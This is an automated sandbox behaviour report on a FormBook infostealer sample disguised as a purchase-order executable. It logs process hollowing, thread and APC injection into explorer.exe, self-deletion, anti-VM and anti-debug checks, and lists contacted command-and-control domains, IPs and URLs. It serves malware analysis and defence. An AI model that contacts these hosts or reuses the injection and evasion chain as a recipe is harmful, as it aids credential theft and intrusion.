Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E50000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1 Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process created: C:\Users\user\Desktop\PO45937008ADENGY.exe C:\Users\user\Desktop\PO45937008ADENGY.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe' Jump to behavior
Source: explorer.exe, 0000000C.00000002.914070199.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.915192555.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000011.00000002.916038112.0000000005F20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Queries volume information: C:\Users\user\Desktop\PO45937008ADENGY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383974 Sample: PO45937008ADENGY.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 39 www.softballlyfe.com 2->39 41 www.helpmewithmyenergy.com 2->41 43 2 other IPs or domains 2->43 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 4 other signatures 2->67 11 PO45937008ADENGY.exe 15 4 2->11         started        signatures3 process4 dnsIp5 51 104.21.56.119, 443, 49727 CLOUDFLARENETUS United States 11->51 53 myliverpoolnews.cf 172.67.150.212, 49726, 80 CLOUDFLARENETUS United States 11->53 73 Tries to detect virtualization through RDTSC time measurements 11->73 75 Hides threads from debuggers 11->75 15 PO45937008ADENGY.exe 11->15         started        18 cmd.exe 1 11->18         started        20 WerFault.exe 23 9 11->20         started        22 2 other processes 11->22 signatures6 process7 signatures8 77 Modifies the context of a thread in another process (thread injection) 15->77 79 Maps a DLL or memory area into another process 15->79 81 Sample uses process hollowing technique 15->81 83 Queues an APC in another process (thread injection) 15->83 24 explorer.exe 15->24 injected 28 conhost.exe 18->28         started        30 timeout.exe 1 18->30         started        process9 dnsIp10 45 tuyensinhhaiphong.com 123.31.43.181, 49771, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 24->45 47 onstatic-pt.setupdns.net 81.88.57.70, 49764, 80 REGISTER-ASIT Italy 24->47 49 20 other IPs or domains 24->49 69 System process connects to network (likely due to code injection or exploit) 24->69 71 Performs DNS queries to domains with low reputation 24->71 32 wlanext.exe 24->32         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 32->55 57 Maps a DLL or memory area into another process 32->57 59 Tries to detect virtualization through RDTSC time measurements 32->59 35 cmd.exe 1 32->35         started        process14 process15 37 conhost.exe 35->37         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
166.62.28.107
 accessibleageing.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
154.210.110.99
 www.szmsbk.com Seychelles
54600 PEGTECHINCUS true
123.31.43.181
 tuyensinhhaiphong.com Viet Nam
45899 VNPT-AS-VNVNPTCorpVN true
172.67.132.70
 www.belatopapparel.xyz United States
13335 CLOUDFLARENETUS true
172.67.150.212
 myliverpoolnews.cf United States
13335 CLOUDFLARENETUS false
3.223.115.185
 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com United States
14618 AMAZON-AESUS false
81.88.57.70
 onstatic-pt.setupdns.net Italy
39729 REGISTER-ASIT true
198.185.159.144
 ext-sq.squarespace.com United States
53831 SQUARESPACEUS false
34.102.136.180
 helpmewithmyenergy.com United States
15169 GOOGLEUS false
185.199.108.153
 pradnyanamaya.github.io Netherlands
54113 FASTLYUS true
85.17.172.1
 thelandcle.com Netherlands
60781 LEASEWEB-NL-AMS-01NetherlandsNL true
104.21.56.119
 unknown United States
13335 CLOUDFLARENETUS false
52.15.160.167
 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com United States
16509 AMAZON-02US false

Contacted Domains

Name IP Active
onstatic-pt.setupdns.net 81.88.57.70 true
thelandcle.com 85.17.172.1 true
helpmewithmyenergy.com 34.102.136.180 true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 3.223.115.185 true
softballlyfe.com 34.102.136.180 true
www.szmsbk.com 154.210.110.99 true
tuyensinhhaiphong.com 123.31.43.181 true
accessibleageing.com 166.62.28.107 true
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 52.15.160.167 true
pradnyanamaya.github.io 185.199.108.153 true
myliverpoolnews.cf 172.67.150.212 true
bookitstaugustine.com 34.102.136.180 true
ext-sq.squarespace.com 198.185.159.144 true
merkuryindustries.com 34.102.136.180 true
www.belatopapparel.xyz 172.67.132.70 true
www.bookitstaugustine.com unknown unknown
www.helpmewithmyenergy.com unknown unknown
www.hepimizdostuz.com unknown unknown
www.merkuryindustries.com unknown unknown
www.pradnyanamaya.com unknown unknown
www.hnchotels.com unknown unknown
www.softballlyfe.com unknown unknown
www.accessibleageing.com unknown unknown
www.thelandcle.com unknown unknown
www.beyju.store unknown unknown
www.theskineditco.com unknown unknown
www.tuyensinhhaiphong.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ true
  • Avira URL Cloud: safe
 unknown
http://www.bookitstaugustine.com/mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl false
  • Avira URL Cloud: safe
 unknown
http://www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl true
  • Avira URL Cloud: safe
 unknown
www.hnchotels.com/mb7q/ true
  • Avira URL Cloud: safe
 low
http://www.szmsbk.com/mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl true
  • Avira URL Cloud: safe
 unknown
http://www.softballlyfe.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp false
  • Avira URL Cloud: safe
 unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html false
  • Avira URL Cloud: safe
 unknown
http://www.accessibleageing.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr true
  • Avira URL Cloud: safe
 unknown
http://www.pradnyanamaya.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ true
  • Avira URL Cloud: safe
 unknown
http://www.merkuryindustries.com/mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl false
  • Avira URL Cloud: safe
 unknown
http://www.helpmewithmyenergy.com/mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl false
  • Avira URL Cloud: safe
 unknown